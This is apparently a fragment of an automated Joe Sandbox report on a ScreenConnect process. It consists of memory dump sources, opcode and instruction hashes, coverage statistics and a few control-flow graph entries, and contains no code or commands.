                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790197317.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ed000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7f8e32246fc64d18477481ef332439145a09441f340daf45eaa87a91b554608f
                                                                                                                                                                                                                                                          • Instruction ID: 6188d39d7e38f2033f759769ca4c72f6ea5618605129b0a36bce7e5256e59e7d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f8e32246fc64d18477481ef332439145a09441f340daf45eaa87a91b554608f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C12122B5505280DFCB25DF15D9C4B26BF65FB9C314F2085A9E8090B25AC33ADC56CBA2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790197317.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ed000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                                                                                                                                                                                          • Instruction ID: ea7f6572fb545b2bbc425563551cca20658a0537541d560ada5b4c6a6d42a9b5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0911E676504280CFCF16CF10D5C4B16BF72FB98314F24C5A9D8490B256C33AD85ACBA2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790197317.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ed000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1adc306b009db68df9fef51e62554fb656723e7d1905514f796d124d5c261f72
                                                                                                                                                                                                                                                          • Instruction ID: 05b4ad8fcd5abd9e85d385f64fac2157ec6b26e86728f28ebdaa467b4f462032
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1adc306b009db68df9fef51e62554fb656723e7d1905514f796d124d5c261f72
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B01F7711063809AD7308A16CD84B67BF98EF49320F1CC419EC091A186C27D9C01C6B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790197317.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ed000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 180a74c129995bf68ccc3920f4cd84772416acc7982350ab323448ea6644c221
                                                                                                                                                                                                                                                          • Instruction ID: 03f265b700e9a7c37feb19bbca9b88f16ec659b23fd6eb633e5eaec964c64f00
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 180a74c129995bf68ccc3920f4cd84772416acc7982350ab323448ea6644c221
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF06DB1405384AEE7208A1ACD88B62FFA8EF55724F18C55AED485E286C2799C45CAB1

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:12.6%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:6
                                                                                                                                                                                                                                                          Total number of Limit Nodes:0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 151 7ffe7dd8366b-7ffe7dda5860 ConnectNamedPipe 156 7ffe7dda5868-7ffe7dda58b0 call 7ffe7dda58b1 151->156 157 7ffe7dda5862 151->157 157->156
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1786457980.00007FFE7DD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD80000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7dd80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2191148154-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 141 7ffe7dd83652-7ffe7dda5860 ConnectNamedPipe 146 7ffe7dda5868-7ffe7dda58b0 call 7ffe7dda58b1 141->146 147 7ffe7dda5862 141->147 147->146
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1786457980.00007FFE7DD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD80000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7dd80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2191148154-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 161 7ffe7dd83a92-7ffe7dd880ef 163 7ffe7dd880f6-7ffe7dd88150 SetProcessMitigationPolicy 161->163 164 7ffe7dd88158-7ffe7dd88187 163->164 165 7ffe7dd88152 163->165 165->164
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1786457980.00007FFE7DD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD80000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7dd80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 167 7ffe7dd880bf-7ffe7dd88150 SetProcessMitigationPolicy 169 7ffe7dd88158-7ffe7dd88187 167->169 170 7ffe7dd88152 167->170 170->169
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1786457980.00007FFE7DD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD80000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7dd80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @*}
                                                                                                                                                                                                                                                          • API String ID: 0-170568029

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 293 7ffe7e09264b-7ffe7e092659 294 7ffe7e092660-7ffe7e092671 293->294
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @*}
                                                                                                                                                                                                                                                          • API String ID: 0-170568029

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 296 7ffe7e092889-7ffe7e092891
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @*}
                                                                                                                                                                                                                                                          • API String ID: 0-170568029
                                                                                                                                                                                                                                                          • Opcode ID: 1b533a2102b8ffd6efef18f65206f9357d1860b14c762f997420c01a29439349
                                                                                                                                                                                                                                                          • Instruction ID: 78772ec4ac6aebe12d4cc05751ae937365454ba62788197b6bfb144a19936be2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b533a2102b8ffd6efef18f65206f9357d1860b14c762f997420c01a29439349
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C90041171CC0535735D41171D7115C10D37DCC00475F104CD05FC3751CF74D4051511

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 28df3ab969c3555e133f81fda0b5339bef68b74f93aff585d24384f7345192dc
                                                                                                                                                                                                                                                          • Instruction ID: 92f95ea5e244d92165caa7ceb43e777088ae4b5f1a9dda87c7f37116e3516252
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28df3ab969c3555e133f81fda0b5339bef68b74f93aff585d24384f7345192dc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3A1E73692CA564FE7B5AA2990503F537D2EF85314F5901B5C8EDCB1E3DE2CB8428760

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f09ea8eedf370d81ac0e4297c000c4f6bd54d61168f44c1d4f023fc152aa6811
                                                                                                                                                                                                                                                          • Instruction ID: 7d71b53e6bf1b9f3eea2885b12c72e9e6544393ef6f742195c7d06f1de55d76c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f09ea8eedf370d81ac0e4297c000c4f6bd54d61168f44c1d4f023fc152aa6811
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6A1737162CA1A8FE7A8EF58C491BB532D2FF58305F544178E99DCB2A2DE68FC418740
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5155603c6a778311bb28c4cd7c4dbf80d0f69c9cd0f720de0884926cbe5c4a1b
                                                                                                                                                                                                                                                          • Instruction ID: d37401b694fc76e46880fcc2936323c21fe79ef70c75270672b5ac7f6e39fd88
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5155603c6a778311bb28c4cd7c4dbf80d0f69c9cd0f720de0884926cbe5c4a1b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1316E35A2CA174AEB7ADF25506067961D3AFC4305F54453CD4BE871E2ED2CF8418641
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e4010d91d82ff4f350a091b52973647c037145b579c68a5719ff6d9c5e4fa656
                                                                                                                                                                                                                                                          • Instruction ID: 48cf6c46c732c8b37722914d78359899e4c7fb48171a5c6c2c08d2dcf497f2d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4010d91d82ff4f350a091b52973647c037145b579c68a5719ff6d9c5e4fa656
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A21273245DB894FD7A6AB3888491A57BF1FF95224B0802BBD4D9C75A2DA2CB842C741
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7c67bb6271054438a3a18b55c041981bfe575056187203b8011e9879943e399c
                                                                                                                                                                                                                                                          • Instruction ID: ae10f20a28e6d2cfaae6c9a4be496660c290d4b40ec022ad028b582a2280211e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c67bb6271054438a3a18b55c041981bfe575056187203b8011e9879943e399c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F321C62356C9460FE756966CA8157F427D2EFC4350F4C01B6D8ACC62E2DD1CA8868351
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7b1c644f424bd888e8a930d12c36347428a00f814893d16fca3b539af4b4f58e
                                                                                                                                                                                                                                                          • Instruction ID: dfc40af5c751dfc32081caf1c712711f32b7b50f83e1e19c9266d1efca9d8450
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b1c644f424bd888e8a930d12c36347428a00f814893d16fca3b539af4b4f58e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E113731218A088FDF88EE28D091FA533E1FB69314F2540ADD45EDB287CA36E852CB40
Memory Dump Source
• Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 038e426cae9d3ebb9940018a0df5813e22378a1afbcb7fdcb224a57a9f286f98
                                                                                                                                                                                                                                                          • Instruction ID: d55a06aa98343d25b9fa962a47a987719c5b4e485f6ca7b5bc4e5894c044be90
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 038e426cae9d3ebb9940018a0df5813e22378a1afbcb7fdcb224a57a9f286f98
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73110A26D2C6470BF769962984A137826D2BFA1340F4D41BBC4A9C25F6DD5CBC858301
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4d4d61859f93acc2c00baa976da8f8a9d073f8628377bb97bfc7668fc0abea98
                                                                                                                                                                                                                                                          • Instruction ID: 94f6df65b1d3d2a44dd6346cf6944c9b44261ae76dc5471820cac7311d213a93
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d4d61859f93acc2c00baa976da8f8a9d073f8628377bb97bfc7668fc0abea98
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF0F61792D9CA0FF3E9962D28982769AD3DBD5222B2902FBD4ACC31E6EC0D6C454341
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6ff362827633048971fef958e1c4d8be88bd100d52368310368e3de57ae0a647
                                                                                                                                                                                                                                                          • Instruction ID: fa4a2d96bbaa7fa7973ef93ff8fa759af5ca69d69b12ba387f77acbb85ca0f4a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff362827633048971fef958e1c4d8be88bd100d52368310368e3de57ae0a647
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF0F93391D64D8BE760BA5498485A977B1FF98304F040534E0ECD71A2EB386D45C741
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9e6885156d873640aa3cf62146567a6617f58876689fd49687005bae16bce529
                                                                                                                                                                                                                                                          • Instruction ID: 41cec273f5ec7838c1ea20b193a2752abb5c96c331ccfcf5bace42251a75f47a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e6885156d873640aa3cf62146567a6617f58876689fd49687005bae16bce529
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F0FC21A18D5E0BE6E4BAAC5495278B2C2FF98710F494079C46DC32D3EE1CAC524380
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e2cf131014631e91efb05e5464b3f924b5eb1f16944664ef53bc37cb6d525cd3
                                                                                                                                                                                                                                                          • Instruction ID: 67ec635d54dab98c3262a0859350d4381b7da335c9ff205f82161ebab271add0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2cf131014631e91efb05e5464b3f924b5eb1f16944664ef53bc37cb6d525cd3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4018631A395171DFE99EF1640A17B82293AF85351F84017CC8AECE1E3CE2CB8098620
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3766f797cae46827ed5d974a528be82ac0f97d828ece838312137e52c1200076
                                                                                                                                                                                                                                                          • Instruction ID: b56c1fe449e3a17720a5f574b3ea2f35ff156f2e973abd28c61ba4e94fd6487c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3766f797cae46827ed5d974a528be82ac0f97d828ece838312137e52c1200076
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF0EC3321DB850FE7A8DE6CA8835B577D1EB43270B840ABEC9D9C75A7D50AF4428385
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0504cd9b938b9e755587f04e2a4cca3d30e1cd70ce200f1d0da836aff9d56b29
                                                                                                                                                                                                                                                          • Instruction ID: 17558216c86a3e46292a5cc435fab4abf86390a773042fc33a89313d10f69d74
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0504cd9b938b9e755587f04e2a4cca3d30e1cd70ce200f1d0da836aff9d56b29
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0E233E0C6599FCB01EF6CD4618E57B70EF41314B0101B3D05CCB062CA26B808CB81
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 38924c9b855e0d3929b99ee5137ebd1ab16aa680e8d8dbcc36a83963673374c9
                                                                                                                                                                                                                                                          • Instruction ID: e6500f37b7fb3f4e68bce4b46f385ec243f4c6a699b2849b34e091d804f1475e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38924c9b855e0d3929b99ee5137ebd1ab16aa680e8d8dbcc36a83963673374c9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F05435A2851B4EEEA5DE0A80907B023D3FF89300F980178C85DCB2E6CD3DBC048761
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
